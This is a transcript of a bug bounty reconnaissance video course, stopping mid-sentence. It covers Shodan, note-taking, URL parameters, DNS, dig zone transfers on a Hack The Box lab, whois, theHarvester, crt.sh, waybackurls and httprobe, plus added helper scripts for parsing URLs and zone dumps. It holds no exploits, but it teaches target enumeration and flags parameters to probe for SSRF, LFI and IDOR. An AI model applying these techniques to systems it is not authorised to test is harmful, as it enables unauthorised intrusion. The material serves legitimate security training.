One of the last things I want to cover is the monitor function. You have to have an account to use this, but it's something you might be interested in. With monitoring you enter a specific target, such as yahoo.com, and it updates you whenever new software shows up or whenever there's a change to the program you're monitoring, so you can be one of the first to check out a new subdomain or domain if it's in scope, or if they update a piece of software, one of the first to see whether there are any CVEs for the software they updated. So the monitor is one that bug bounty hunters really like to use, because you get notifications when things change on a specific target, and you're one of the first to know and one of the first to go out and test it. But you need to be willing to pay seventy dollars a month. I personally don't think it's worth it, but I know a lot of bug bounty hunters do think it's worth it, so it might be worth it to you to pay the 70 a month to follow specific targets and be one of the first to check them for vulnerabilities.

That concludes our video on Shodan. One thing I want to make sure you understand is that when you run a Shodan search and you're thinking about trying to exploit something, you need to make sure it's in scope and has a bug bounty program; otherwise you could be getting yourself into legal trouble. So before you start looking at a specific target, make sure it has a bug bounty program. If you have any comments or questions, let me know down below and I'll try to get to them as soon as I can. Thanks for watching.

In this video we're going to cover how to take notes for the world of bug bounty hunting, or if you want to become a penetration tester. Note-taking is going to be really important to you: your method of taking notes, and being able to go back and review what you've already done and go through your checklist. So in this video I'm going to show you how I take notes, and we'll use CherryTree within Kali Linux because everybody has access to it; I personally use OneNote, but it's going to be really similar to what I show you here. Some of the benefits of taking really good notes are organized thoughts and being able to write a really simple proof of concept. You'll have screenshots and be able to see what you've previously done, so you won't waste time going back to subdomains you've already enumerated and looked at, because your notes tell you you've already looked at them. And if a new vulnerability comes out, you can see when you last enumerated a specific subdomain and know whether the new CVE applies to that domain and the software running on it. With that, let's jump into it. Here we are on our Kali Linux machine; we can come up to the little drop-down menu and type in cherrytree, and it's already installed if you're running Kali Linux. Using CherryTree is pretty simple. The first thing you'll want in your notes is the main domain
and all of the information you found on it. So you type in domain.com and this gives you a parent node. You can also change up your note-taking method: maybe you want the main domain and each subdomain under it, like this, where "subdomain one" would actually be the subdomain's name, and then you have all of your notes for that subdomain underneath. If you do this, some programs have something like 800 subdomains and it would take forever, but you can come in and add every single subdomain like this, say sub.domain.com (I spelled that wrong), and then all of your notes for that subdomain go inside it. If you go this way, one thing I'd suggest right at the beginning is to call your first sub-node software, and note that it's running some kind of CMS, maybe WordPress, and the version, 4.2.4. Then you know what's running, and in the future if a CVE comes out for that WordPress version, you can come back to this subdomain and see if it's vulnerable to that new CVE.

Another reason you'll want some kind of list of the subdomains (let's delete this one so it looks a little better): if you decide to run a bunch of subdomains in here, type sub1.domain.com, and in here you have a list of all of your subdomains. You can also have sub-nodes inside the specific thing you're looking at, so in here we could say software, and you can see how this organizes our research for us; inside software you'd put WordPress and the version it's running. So those are a couple of different ways to organize your notes.

Another way to save time, instead of typing all of this out: on this box I already have Wappalyzer installed, so we can go to the browser, type in google.com and open up Wappalyzer to see what information is there, and then I could screenshot this, pull the screenshot over to my Kali machine and put it into CherryTree. I don't have this specific Kali box set up to do that, so it won't work for this one, but on the Kali machine I actually use I can pull screenshots back and forth and save them inside CherryTree. I use OneNote, so I don't really have to worry about that too much, but screenshotting and adding information in here is helpful as well if you have that capability.

One thing I like to do at the end of a recon session is make a node like this and call it the recon node, and in there I write down all of the tools I ran and the way I collected the information. That way I have a clear set of notes, and if I ever come back to this target I can see whether I've missed something, or if I've learned a new recon technique I can try it out on this target, and I'll know exactly what I've done and what I can do in the future to analyze it further. So make sure to write down the methodology of your recon and attack, because it may change in the future and you might be able to go back to old notes and old targets and do further enumeration and testing.

Lastly, one of the things that's going to be really helpful in your note-taking process is some kind of checklist, a good checklist of vulnerabilities and recon. You can go out to Google and look for a bunch of different checklists and find whichever one works best for you, maybe copy-paste it into a Word document and modify it and make your own. In the meantime you can just Google "bug bounty checklist", click one of the checklists, look at what's in there and follow their recon. Maybe there's something in there you don't like; I used to use httprobe, but I decided I actually like checking things manually, so I don't use it anymore. But it would be helpful to have something like this, some kind of checklist, so you don't miss bugs, vulnerabilities or hidden subdomains that you would otherwise have missed. This will be really helpful as you're working on and developing your recon skills.

So there are a lot of ways to take notes. I showed you CherryTree only because it's in Kali Linux, and everybody who runs a virtual machine will have access to Kali and to CherryTree, but I personally use OneNote, and maybe there's something else out there you like to use.

All right, we're going to look at a URL real quick and look at its different parts, just so you understand what's going on when you look at them. It's really important in your recon phase to know which URLs look interesting, so you can copy and paste them into your notes and come back once you've finished recon and start testing. I've typed out a basic example here. You're probably all familiar with https and the HTTP protocol; it's labeled as the scheme. The www. is not always there; it's labeled as the subdomain, because sometimes this could be a subdomain listed as sub.domain, and that's the same thing as the www. Then we have the domain name, which would be like google.com. I'm not really sure why the .com is listed as the top-level domain, because you can use .uk or .fr for different countries, or .net, or .org for an organization, and it's still called the top-level domain, but that's this portion of the URL. All of this is pretty basic. You can fuzz the subdomain part, and the most popular subdomain fuzzer I can think of is wfuzz; I'm sure you can use other fuzzers, but wfuzz is the one that works really well for me when I'm doing subdomain fuzzing. Then we run into the path, or the location of the content, as I've labeled it here, but I usually think of this as a directory: this is a directory, and eventually you hit an actual page. You can delete some of these and just go to /blog and see what's there; this is the path to the location of the page. Before we move on, you can also fuzz for directories the same way you fuzz for subdomains, and look for different directories within the subdomain or domain.

Now comes the good part for us. When we move on to the question mark, what you need to remember is that it signifies a query, and a parameter is about to be dropped in. This is where we can start messing with the URL to see what information we can pull back from the server: you can look for an LFI, an RFI, an SSRF, and back in the path you can look for directory traversals. You have a parameter, and usually it will be labeled as something other than "parameter". One that automatically throws up a red flag for me is a parameter called url; then you look to see whether this query is hitting the actual server itself, and if it is, you can start looking for server-side request forgery.
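The breakdown above as code, as an added example that is not part of the course: it splits a URL into the parts labeled in the diagram (scheme, subdomain, domain, TLD, directories, page, query parameters) and flags the parameter names that are worth copying into your notes for later testing. The sample URL, the small list of two-part suffixes and the parameter-name lists are my own assumptions, and the subdomain/domain/TLD split is deliberately naive, which is exactly the point the course raises about .co.uk-style endings.

```python
"""Break a URL into the parts labelled in the diagram above (scheme,
subdomain, domain, TLD, directories, page, query parameters) and flag the
parameters worth copying into your notes. Added example, not the course's
code. The host split is a deliberate simplification: it knows a handful of
two-part public suffixes and otherwise treats the last label as the TLD,
so it will mislabel domains under suffixes not in that list."""
from urllib.parse import parse_qsl, urlsplit

# Small, incomplete list of two-label public suffixes; extend as needed.
TWO_PART_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "gov.uk", "com.au",
                     "net.au", "co.jp", "co.nz", "com.br"}

# Parameter names that, as the course puts it, throw up a red flag, grouped
# by the class of bug they are usually a lead for. The names are assumptions.
PARAM_HINTS = {
    "server-side fetch or redirect (SSRF / open redirect)":
        {"url", "uri", "redirect", "redirect_uri", "next", "return", "callback", "dest"},
    "file or path handling (LFI / RFI / traversal)":
        {"file", "path", "page", "template", "include", "dir", "doc"},
    "object reference (access control / IDOR)":
        {"id", "uid", "user", "account", "order", "invoice"},
}


def split_host(host):
    """Separate www.example.co.uk into subdomain 'www', domain 'example',
    TLD 'co.uk' (see the caveat in the module docstring)."""
    labels = host.lower().split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_PART_SUFFIXES:
        return {"subdomain": ".".join(labels[:-3]), "domain": labels[-3],
                "tld": ".".join(labels[-2:])}
    if len(labels) >= 2:
        return {"subdomain": ".".join(labels[:-2]), "domain": labels[-2],
                "tld": labels[-1]}
    return {"subdomain": "", "domain": host, "tld": ""}


def parse_url(url):
    """Return the URL's parts as a dict using the diagram's labels."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    # Everything before the last segment is a directory; the last segment is
    # the page unless the path ends with a slash (then it is a directory too).
    if not segments or parts.path.endswith("/"):
        directories, page = segments, ""
    else:
        directories, page = segments[:-1], segments[-1]
    result = {"scheme": parts.scheme, "port": parts.port,
              "directories": directories, "page": page,
              "params": parse_qsl(parts.query, keep_blank_values=True),
              "fragment": parts.fragment}
    result.update(split_host(parts.hostname or ""))
    return result


def noteworthy_params(params):
    """Return (name, reason) for every query parameter named in PARAM_HINTS."""
    hits = []
    for name, _value in params:
        for reason, names in PARAM_HINTS.items():
            if name.lower() in names:
                hits.append((name, reason))
    return hits


if __name__ == "__main__":
    # Constructed sample URL (reserved .test TLD for the embedded link).
    sample = ("https://www.example.co.uk/blog/2019/post.php"
              "?id=42&url=http://cdn.example.test/logo.png&lang=en#top")
    parsed = parse_url(sample)
    for key, value in parsed.items():
        print(f"{key:12} {value}")
    print("worth noting:", noteworthy_params(parsed["params"]))
```

Run it as a script to see the sample URL taken apart; feed parse_url the URLs you collect during recon and keep the ones where noteworthy_params returns something, together with the reason, so the note tells you later what you meant to test and why.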
Or something along those lines. But let's say the parameter is just an id with a value of 42. You can start changing the 42 to other numbers and see what comes back, and maybe see whether you can access information you're not supposed to. So that's a URL, and one of the reasons I wanted to show you this is that when you're in your recon phase and not yet testing, remember to save the URLs that look interesting to you, with different parts you can change or fuzz that you think might pull back information you shouldn't have access to.

In this video we're going to talk about how DNS, the domain name system, works. If you type in something like google.com, how does your browser know where to go to find Google's IP address and resolve the web page for you? I Googled "how DNS works" and had to go through a few pages before I found something that was actually a good example, and I thought this one was really good, so we're going to walk through it.

You have a person who types in a domain, dnsimple.com. First it checks the web browser's cache on your local machine to see if you've visited this page before. If you ever go to facebook.com and log in, next time you go to facebook.com it automatically logs you in, because you've stored your session and cookies in your browser's cache. But if you log into facebook.com in Firefox and then go to Chrome and try to log into facebook.com, you have to re-authenticate, because Chrome doesn't have that stored in its cache. So the first place a web address goes when you type it in is the browser, to see if it's stored in the cache. Before we move on, you can see google.com has an IP address. The reason you have domain names attached to IP addresses is that it's easier for us to remember a domain name such as Facebook than a string of numbers for facebook.com or a bunch of other web apps; we just remember Google, we don't need to remember this string of numbers. So the purpose of a domain name is to give you an easy way to remember the contents of a specific IP address, which resolves to Google or Facebook or Wikipedia, as you see here.

After your browser tries to gather the information and isn't able to, on the next page the packets move out to the ISP server, your internet service provider, and ask: how do we find this website? It tells us that the root server knows where to find the location of the .com TLD. We've talked about the TLD before: it's the top-level domain, which can be .com, .org, .edu, .uk, .fr and many others, and those are the top-level domain servers. So you go out to the root server, and the root server gives back which TLD server you're looking for, the one that contains the information you want: the .com TLD or the .org TLD. The root server passes you on to the next server in line. So here we are at the root server; our packets make the request, and we're told it doesn't know where to find dnsimple.com but it can tell us where the TLD is located and send us on our way. You can see here is the root and here are the TLDs, and it sends us to the right one.

Before we move on too far, if you're wondering how this works with something like the Tor Browser: my understanding is that it encrypts all of your data so the ISP isn't able to track the web application you're trying to reach. The Tor network opens up a bunch of nodes for your encrypted data, and it doesn't actually go through this process until after it has reached the exit node, and that's how your ISP isn't able to track where you're sending your requests. The same thing would work with a VPN as well.

On to the next page: it gives a bit of history about the TLDs that we don't really care about, and finally we make it to the .com TLD, which says here is name server 1, name server 2, name server 3 and name server 4. I'm not positive, but I think all domains will have four name servers; if you host with Cloudflare or Google Domains, and I'm pretty sure with any other hosting company, you'll have this ns1 and ns2, and you'll see it when you set up your domain to resolve to a specific IP address. So at this point it sends you to the name server, and on the next page you make it to ns1, which says I can give you the IP address, and then you get the IP address and you're able to resolve to the specific IP address of the domain you typed in the beginning, such as google.com. I hope this made sense; if not, you can watch it again, or read through the page yourself (the URL is right here), or Google around and read something else that explains how DNS works if this was too confusing. You don't necessarily need to know all of this to move on into the world of ethical hacking, but I thought it would be helpful for you to understand how the web works.

All right, in this video we're going to cover a tool called dig, and it will check for zone transfers. You're going to hear about zone transfers; they are a great way to find additional subdomains.
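The resolution chain walked through above (browser cache, resolver at the ISP, root server, TLD server, authoritative name server), as an added example that is not part of the course: a small in-memory DNS hierarchy and a resolver that asks each level in turn and caches the answer, so the second lookup of the same name never leaves the cache. The hierarchy, server names (reserved .test TLD) and addresses (192.0.2.0/24 documentation range) are constructed; nothing here talks to the network.

```python
"""Simulated iterative DNS resolution, following the chain walked through
above: browser cache -> resolver at the ISP -> root -> TLD server ->
authoritative name server. Added example with a constructed, in-memory
hierarchy; it sends no traffic and is not the course's own code."""

# Constructed hierarchy. Server names use the reserved .test TLD and the
# addresses come from the 192.0.2.0/24 documentation range.
ROOT_HINTS = {"com": "a.gtld.test", "org": "a.org.test"}  # root knows only TLD servers
TLD_SERVERS = {  # each TLD server knows the NS delegation of the domains under it
    "a.gtld.test": {
        "dnsimple.com": ["ns1.dnsimple.test", "ns2.dnsimple.test"],
        "google.com": ["ns1.google.test"],
    },
    "a.org.test": {"wikipedia.org": ["ns0.wikimedia.test"]},
}
AUTHORITATIVE = {  # each name server holds the A records of its own zone
    "ns1.dnsimple.test": {"dnsimple.com": "192.0.2.10", "www.dnsimple.com": "192.0.2.10"},
    "ns2.dnsimple.test": {"dnsimple.com": "192.0.2.10", "www.dnsimple.com": "192.0.2.10"},
    "ns1.google.test": {"google.com": "192.0.2.20", "www.google.com": "192.0.2.21"},
    "ns0.wikimedia.test": {"wikipedia.org": "192.0.2.30"},
}


class Resolver:
    """The recursive resolver, with a cache in front of it that plays the
    role of the browser cache from the walkthrough."""

    def __init__(self):
        self.cache = {}

    def resolve(self, name):
        """Return (ip, steps): ip is None when the name does not exist and
        steps records who was asked, in order."""
        name = name.lower().rstrip(".")
        if name in self.cache:          # step 0: answered locally, nobody asked
            return self.cache[name], ["cache"]
        steps = []

        # Step 1: the root only knows which server handles the TLD (.com, .org ...).
        tld_server = ROOT_HINTS.get(name.rsplit(".", 1)[-1])
        steps.append(f"root -> {tld_server or 'unknown TLD'}")
        if tld_server is None:
            return None, steps

        # Step 2: the TLD server returns the NS delegation for the registered
        # domain; the longest matching zone wins (www.dnsimple.com -> dnsimple.com).
        delegations = TLD_SERVERS[tld_server]
        zone = next((z for z in sorted(delegations, key=len, reverse=True)
                     if name == z or name.endswith("." + z)), None)
        if zone is None:
            steps.append(f"{tld_server} -> no delegation")
            return None, steps
        name_server = delegations[zone][0]
        steps.append(f"{tld_server} -> {name_server}")

        # Step 3: the authoritative server answers from its zone data.
        answer = AUTHORITATIVE[name_server].get(name)
        steps.append(f"{name_server} -> {answer or 'NXDOMAIN'}")
        if answer:
            self.cache[name] = answer   # the next lookup of this name skips the chain
        return answer, steps


if __name__ == "__main__":
    r = Resolver()
    for host in ("www.dnsimple.com", "www.dnsimple.com", "wikipedia.org", "example.net"):
        ip, steps = r.resolve(host)
        print(f"{host}: {ip}  via {' | '.join(steps)}")
```

Run it as a script and compare the two lookups of www.dnsimple.com: the first goes root, TLD, name server, the second is answered from the cache, which is the same reason the browser example in the walkthrough doesn't ask anyone the second time.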
You can use ffuf, gobuster and wfuzz to try to brute-force subdomains, and use Sublist3r, but you can also use dig. It's really quick, and if there are any subdomains it's a really helpful tool, because you'll find them right away. A DNS zone transfer is supposed to replicate a DNS database between DNS servers, which means that if a server is vulnerable to a zone transfer it will give us information like subdomains and some other things, which we'll see in a second. I've started the box FriendZone from Hack The Box because it's vulnerable to a zone transfer. If you find a bug bounty program that's vulnerable to a zone transfer, you're not able to exploit it and hack the web application per se, but when you find a zone transfer you can report it as information disclosure, because it's something that should not be open to the world.

The easy way to test this is with dig. We type dig axfr, then @ followed by the IP address, then friendzone.red, because that's the domain we're after, run it and see what it spits out. We get friendzone.red several times, then administrator1, which would be worth checking out, hr, and uploads, which would also be worth checking out if you're doing a CTF or find this out in the wild. You can save all of this into an output file; we'll call it zone, with dig axfr @<ip> friendzone.red > zone. From other recon done on this box you also find another domain called friendzoneportal.red, and if we run that we find admin, files, imports, vpn and all of these as well, and if you use a double caret (>>) it appends to the file. So if we cat zone we have all of this information.

Now, if you've taken my little bash course, you know we can cat zone and pipe it into grep friendzone, and that gives us everywhere friendzone appears. Then we pipe into awk with curly braces and quotes, awk '{print $1}', because we only want the first column of this file, and see what happens: yep, that's what I thought, it gives us what we want. Then we pipe into sort -u, which gets rid of the duplicates; it sorts it for us and removes a lot of the repeats, and now you have a nice little file with just the subdomains we pulled down from the zone transfer. The whole pipeline is cat zone | grep friendzone | awk '{print $1}' | sort -u.

So a zone transfer is something you should always look at. If you're on a Hack The Box machine you may have to add more of these to your /etc/hosts file, but out in the wild these would be really good targets to go test and find exploits on. This is the zone transfer with the dig tool; remember it whenever you see port 53 open, because that's the port used for zone transfers. A few things to remember about this tool: if you run an nmap scan and port 53 is open, you can always try a zone transfer and see whether you can pull down additional subdomains; it's a great place to grab subdomains, and you can also report it as information disclosure if you're actually able to pull off a zone transfer. With that we'll move on to the next tool.

All right, I want to cover two more recon tools that you're going to hear about but that I don't use a whole lot, because I don't think I get a lot of helpful information from them. But you'll see them in pretty much every penetration testing textbook and every certification course you ever come in contact with: whois and nslookup.
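The cat | grep | awk | sort -u pipeline above, generalised a little, as an added example that is not part of the course: it parses raw dig axfr output into a name-to-record-types map, lists the names belonging to one domain exactly (so friendzone.red does not also pick up the friendzoneportal.red names the way grep friendzone does), and checks whether the dump is a complete zone (SOA first and last) rather than a refused transfer. The transcript embedded in the block is constructed to look like the two zones pulled in the video; the server address 192.0.2.53, the TTLs and the record data are made up.

```python
"""Parse `dig axfr` output into names, generalising the
grep | awk '{print $1}' | sort -u pipeline. Added example, not the course's
code. ZONE_FILE is a constructed transcript shaped like the two zones pulled
in the video and appended to one file with `>>`; the server 192.0.2.53 and
the record data are made up."""
from collections import defaultdict

ZONE_FILE = """\
; <<>> DiG 9.16.1 <<>> axfr @192.0.2.53 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.\t\t604800\tIN\tNS\tlocalhost.
friendzone.red.\t\t604800\tIN\tA\t192.0.2.53
administrator1.friendzone.red. 604800\tIN\tA\t192.0.2.53
hr.friendzone.red.\t604800\tIN\tA\t192.0.2.53
uploads.friendzone.red.\t604800\tIN\tA\t192.0.2.53
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 1 msec
;; SERVER: 192.0.2.53#53(192.0.2.53)
;; XFR size: 7 records (messages 1, bytes 250)

; <<>> DiG 9.16.1 <<>> axfr @192.0.2.53 friendzoneportal.red
;; global options: +cmd
friendzoneportal.red.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.\t604800\tIN\tNS\tlocalhost.
friendzoneportal.red.\t604800\tIN\tA\t192.0.2.53
admin.friendzoneportal.red. 604800\tIN\tA\t192.0.2.53
files.friendzoneportal.red. 604800\tIN\tA\t192.0.2.53
imports.friendzoneportal.red. 604800\tIN\tA\t192.0.2.53
vpn.friendzoneportal.red.\t604800\tIN\tA\t192.0.2.53
friendzoneportal.red.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 1 msec
;; SERVER: 192.0.2.53#53(192.0.2.53)
;; XFR size: 8 records (messages 1, bytes 270)
"""


def record_lines(text):
    """Yield the field lists of resource-record lines. dig's own commentary
    starts with ';'; a record is <owner> <ttl> <class> <type> <rdata...>."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and not fields[0].startswith(";") and fields[2] == "IN":
            yield fields


def parse_axfr(text):
    """Return {owner name: set of record types}, names lower-cased without
    the trailing dot (the awk '{print $1}' step plus the sort -u step)."""
    records = defaultdict(set)
    for fields in record_lines(text):
        records[fields[0].rstrip(".").lower()].add(fields[3])
    return dict(records)


def names_in_domain(records, domain):
    """Names belonging to exactly one domain: the 'grep friendzone' step,
    done so that friendzone.red does not also match friendzoneportal.red."""
    domain = domain.lower().rstrip(".")
    return sorted(n for n in records if n == domain or n.endswith("." + domain))


def zone_transfer_allowed(text):
    """True when the dump is a complete zone, which dig frames with the SOA
    record at both ends. A refused transfer yields no record lines at all."""
    types = [fields[3] for fields in record_lines(text)]
    return len(types) >= 2 and types[0] == "SOA" and types[-1] == "SOA"


if __name__ == "__main__":
    recs = parse_axfr(ZONE_FILE)
    print("complete zone data:", zone_transfer_allowed(ZONE_FILE))
    for domain in ("friendzone.red", "friendzoneportal.red"):
        for name in names_in_domain(recs, domain):
            print(f"{name:32} {', '.join(sorted(recs[name]))}")
```

Run it as a script to see the names from both zones with their record types. For a real engagement, replace ZONE_FILE with the contents of the zone file you saved with dig, and keep zone_transfer_allowed in mind when writing the information-disclosure report: a complete SOA-to-SOA dump is the evidence that the name server answered an AXFR it should have refused.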
We'll do nslookup real quick because it doesn't give us back a whole lot of information. Type nslookup, then something like www.google.com, and it tells you the IP address, the domain name, and the IPv6 address, and the query goes to the resolver on port 53. So this is a tool you would run if you see port 53 open, same as dig, and you get just a little bit of information back with nslookup. You'll hear about it and you will definitely see it in the future; this is what it does. Then there's another one you're going to hear about and see regularly, and it's whois. If you type whois google.com you get back a whole bunch of information, and if you're ever doing a penetration test this is actually a good one to run, because sometimes you get back email addresses and a phone number and things like that about the company, so you can find out a little bit more about them. Right here you see they're using the Google name servers, which isn't that surprising for Google, but if you look at who google.com is registered with, it's not even Google Domains, which is kind of ironic: Google does not have its own domain name registered with itself. I'm guessing they must trust MarkMonitor more with security than they trust themselves, which is saying something; I think Google should probably switch that, but anyway, if you know why they're using MarkMonitor instead of Google Domains feel free to let me know in the comments. Maybe they're just using it because they've never changed it since Google Domains came out. Anyway, this is whois, and it just tells you more information about the domain name, where it's registered, who's running it, and you can look to see if there is anything interesting there. You're probably not
going to find a whole lot from whois other than the domain name, where and with whom it's registered, the name servers and basic information like that. So these are two tools you're definitely going to hear about in the future and they're worth remembering, but I don't use them all that much because I don't find them to be that helpful; I wanted you to know they exist and what they do. Another tool worth your time investigating is theHarvester. It looks like this: it goes out and looks for other domains and subdomains, and it will also find email addresses for you to target if you're a penetration tester. The usage is really pretty simple: type theHarvester, pass in a domain with -d, and then pass in the source you want to search with -b, so domain.com and then, say, google, or any of these other options listed for the source, and it will scrape those search engines for subdomains, email addresses and things of that nature. theHarvester is a penetration testing tool you're going to hear about from time to time and one to be aware of; you're probably not going to use it much in pursuit of certifications or CTFs, but it is a really great recon tool and one you should know about. Next we're going to look at crt.sh. I've gone ahead and pulled it up here; this is actually the second time shooting this video because I forgot to press record the first time. When all else fails when you're looking for subdomains, crt.sh is going to be a great place to come: it shows you the certificates issued for the domain you are looking at, pulled from the certificate transparency logs. So we'll go ahead and open
it up and type in tesla.com, hit search, and look at the subdomains it pulls down. You're interested in the Matching Identities column in the middle, because if you look closely you can see these subdomains for tesla.com, and that gives you a bunch of subdomains to go out and look at and test for bugs. When I look at something like this with so many subdomains, one of the first things is to see which ones look specifically interesting to you and then go check those, but always make sure they are in scope: first make sure the asset is actually owned by Tesla, then make sure it's in the program's scope. A second tip is to look for dev: dev sites and dev subdomains like these are typically hosting new software or new code before it goes live on the main domain, so devs are always something good to look at. Another good one is admin portals: see if you can get into any of those, or fuzz for directories, because there might be something that should require authentication but you can access without being authenticated. So the devs, the admin pages, and this API subdomain would be interesting to look at. If amass and Sublist3r are not pulling back enough subdomains for you, you can always come to crt.sh and check this out.
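Because "is it in scope?" comes up with every one of these tools, here is an added shell helper (not from the course) that filters a list of discovered hosts against a program's scope. It assumes the scope is written one pattern per line, as exact hostnames or wildcards like *.example.com, with out-of-scope patterns in a second file; the scope entries and hosts used to exercise it are constructed, not a real program's.

```shell
#!/bin/sh
# Added example (not the course's own script): keep only hosts that match an
# in-scope pattern and no out-of-scope pattern. Patterns are exact hostnames or
# "*.example.com" style wildcards, one per line; the domains here are placeholders.

# matches_any HOST PATTERN_FILE
# Returns 0 if HOST matches any pattern in the file. "*.example.com" matches a
# subdomain at any depth but NOT the apex "example.com" itself (list that
# separately if the program includes it), which mirrors how most platforms write scopes.
matches_any() {
    host="$1"; file="$2"
    [ -f "$file" ] || return 1
    while IFS= read -r pat || [ -n "$pat" ]; do
        case "$pat" in
            ''|'#'*) continue ;;                 # blank lines and comments
            '*.'*)   suffix="${pat#\*}"          # "*.example.com" -> ".example.com"
                     case "$host" in
                         *"$suffix") return 0 ;;
                     esac ;;
            *)       [ "$host" = "$pat" ] && return 0 ;;
        esac
    done < "$file"
    return 1
}

# in_scope SCOPE_FILE [EXCLUDE_FILE]
# Reads hostnames on stdin (one per line, as amass/Sublist3r/crt.sh give them),
# lowercases them, strips any scheme, path or port, and prints only the in-scope ones.
in_scope() {
    scope="$1"; exclude="${2:-/dev/null}"
    while IFS= read -r line || [ -n "$line" ]; do
        h=$(printf '%s' "$line" | tr 'A-Z' 'a-z' | sed -E 's|^[a-z]+://||; s|[/:].*||')
        [ -n "$h" ] || continue
        if matches_any "$h" "$scope" && ! matches_any "$h" "$exclude"; then
            printf '%s\n' "$h"
        fi
    done
}

# Usage: amass enum -passive -d example.com | in_scope scope.txt out-of-scope.txt
```

Note that the wildcard match is a suffix match on ".example.com", so a look-alike such as example.com.evil.test never passes; anything that passes still has to be checked against the program page, since scopes change and the file is only as current as you keep it.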
In this video, what we're going to do is grab all of the different possible URL targets within a bug bounty program, then narrow them down to the URLs that are actually responsive, and then to the ones I think will be helpful for you to target as a beginner. So I'm going to show you how to find the most obscure URLs within a bug bounty program for you to target, but always remember to make sure these URLs are in scope; that's going to be really important. Sometimes you'll see URLs that are several years old and a specific bug bounty program has forgotten to remove them; you'll think this is a really great target, but it will end up falling into the category of out of scope. So as you go through your recon phase, only target URLs that are in the program's scope. This is something I really struggled with in the beginning: I would end up out of scope, and you don't want to do that. All right, there is something called the Wayback Machine which is really cool, and we're going to be utilizing it, and thanks to tomnomnom for making a waybackurls tool that is going to save us some time, as well as a couple of other tools. If you want to check this out online, type wayback into Google and you'll be brought to the Wayback Machine. It tells us at the top that it has saved more than 737 billion web pages. Let's check out what it does: type in yahoo.com and it gives us all of the snapshots it has taken of yahoo.com going back to October 17, 1996; this is why it's called the Wayback Machine. It doesn't just take screenshots, it actually stores the URLs, and you can go back to the timestamps and it'll show you what the web page actually looked like at that time. If we click back to the year 2000 and, say, open up February 29th, 2000, we can right-click, open in a new tab, and it renders what that page looked like from its archive, which is pretty cool. Some of the HTML might not render quite right, but that's okay; we really just want to grab the URLs and a lot of the links that were available at that time, just in case they
are still being hosted on our specific target and have not been removed, which does happen: programs and companies will host a specific subdomain, and after a while that subdomain is no longer in use. This is really common with blogs on large companies. Say PlayStation comes out with a new video game: they'll create a subdomain all about that game, then forget about it, years pass, and that subdomain is still up, not updated, and it might be vulnerable to new exploits and CVEs. That's why we want to look back into the past and see if we can grab any subdomains, URLs or links that may lead us to bugs other people have not checked for within those forgotten subdomains and links. So this is the Wayback Machine; you can come in here and get a feel for how it works. Now we're going to install the waybackurls tool by tomnomnom. Come to Google and type in waybackurls tomnomnom and it's going to be the first result. We actually have to install the Go language before we're able to install this, so open up a terminal and type go; if it doesn't turn green (and doesn't print go's help) then you do not have Go installed. What we need to do is run sudo apt update and let it update; if yours doesn't update or gives you some kind of warning you might have to run sudo apt upgrade and then run sudo apt update again. Now that we're updated we can run sudo apt install golang, say yes, and now if we type go it should turn blue (or some other color), meaning we have Go installed. Then we come back to the tomnomnom page and copy the go install command shown there, and it's going to install the tool for us; I think it installs into the directory go
/bin (that is, $HOME/go/bin), and I'll show you that in just a second. We can paste this in. I thought we'd have to run it with sudo, but when I ran it with sudo it didn't work for me, so run it as your normal user: when it installs properly it runs like this and you see nothing in the output. Then cd over to the go bin directory, it looks like this, hit enter, and you're in the directory. If you ls you'll see waybackurls among the files here, and the way we run it is with ./ and then the name of the tool; you can run it with -h to see the options. Okay, so my other VM was freezing so I went ahead and opened up a new one, which is just fine, it will all work the same. I installed it on this new machine and you're going to find it in the go bin, so if I run ls you'll see I actually have a couple of other tools in here, which I'll show you how to install in just a second, but this is the tool you just installed right here. Running it is really simple, but first we need to create a target list. We'll gedit yahoo.txt and just type in yahoo.com; this is the domain we target, and if there are any subdomains you'd want to paste those in as well, like sub.yahoo.com. I'll show you how to grab these subdomains in just a second, so we'll leave it like this and save. Now we can run waybackurls, and while it runs I'll show you how to grab the subdomains. We cat the file we just made and pipe it into waybackurls, and you can save all of the results into an output file by redirecting to the file name you'd like; we'll call it yahoo
.urls and let this run. While that runs we're going to grab some subdomains: run amass enum -passive -d yahoo.com. This might take a second, and it's going to give us a ton of subdomains we'd want to run the waybackurls tool on, because our goal is to find really old pages on these subdomains, via the Wayback tool, that are going to have some vulnerabilities. We'll close out of this, and what we're going to do is just grab about ten of these, because I don't really want to run waybackurls on all of them; you would run it on all of these if you were actually looking for vulnerabilities within these pages, but my goal is just to showcase the tool for you. So we copy some of these subdomains and come back over here; the first run just finished. Now we gedit our yahoo.txt and put all of these subdomains in the file, one per line, like this. You might want to save the amass output into a file so you don't have to copy and paste, but we're not going to do that. We save, and now if we ran waybackurls the exact same way we did before it would pull the archived URLs for all of these subdomains of yahoo.com and save them into the URLs file for us. What I want to show you is, if we run wc on yahoo.txt, that's just the file we made, so run it on the URLs file instead, and it shows we have more than 128,000 archived URLs from the Wayback tool. We don't necessarily want to visit all 128,000 of these, and if we ran waybackurls with all of those subdomains I bet we would have well over a million
different URLs, and we don't really want to check all of those. So now we want to see which ones resolve, in order to know which ones to target. At this point you run sudo apt install httprobe; it looks like this, I already have it installed. After that, type httprobe to make sure it's installed and it should turn blue for you. We run it the same way we ran waybackurls: cat out our yahoo.urls file and pipe it in. I'm going to delete the old output, and while you can save the result into a file, I'm just going to let it spit out to the console and then cancel it. Make sure it's yahoo.urls with an s. It starts working through all of those 128,000 URLs we pulled down and prints the ones that respond down here in the terminal. I'm going to cancel that. The live URLs get printed out just like this into the terminal, or you could save them into an output file, and once you have them you can start to look through which ones look juicy and you want to target. One other thing I want to show you: if you run httprobe -h you'll see you can give it a timeout in milliseconds (there are 1000 milliseconds in a second). If you don't want to wait the default of 10 seconds for each URL to resolve, which is kind of a long time, you can change it and give each URL about a second; that's probably what I would do, so I would run it with -t 1000 instead of the default 10000, so that it only waits a second before it moves on to the next
